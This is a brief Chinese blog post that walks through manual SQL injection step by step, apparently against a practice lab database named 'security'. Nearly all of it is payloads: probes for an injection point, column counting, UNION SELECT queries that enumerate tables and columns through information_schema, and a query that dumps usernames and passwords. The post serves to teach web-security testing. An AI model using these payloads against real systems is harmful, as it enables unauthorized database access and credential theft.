sql手注基本过程

查询id=1

select * from aa where id=1 

寻找sql注入点

select * from aa where id=1‘ and ’1‘=’1 
select * from aa where id=1‘ and ’1‘=’2

查多少列

select * from aa where id=1 ‘ order by 3 %23

查显错位

select * from aa where id=-1’ union select 1,2,3 %23

求表

?id=-1'%20 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 %23

求列

?id=-1'%20 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 %23

求内容

?id=-1'%20 union select 1,(select group_concat(username,0x23,password)from security.users),3 %23
posted @ 2019-09-11 09:54  逍遥人y  阅读(572)  评论(0编辑  收藏  举报